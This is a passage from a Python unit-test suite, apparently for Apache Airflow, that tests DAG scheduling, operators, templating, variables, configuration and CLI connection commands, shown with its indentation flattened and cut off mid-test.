from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 19
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
configuration.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get("core", "FERNET_KEY")
configuration.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# C
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', 'conn_type', 'conn_host', 'conn_login', 'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
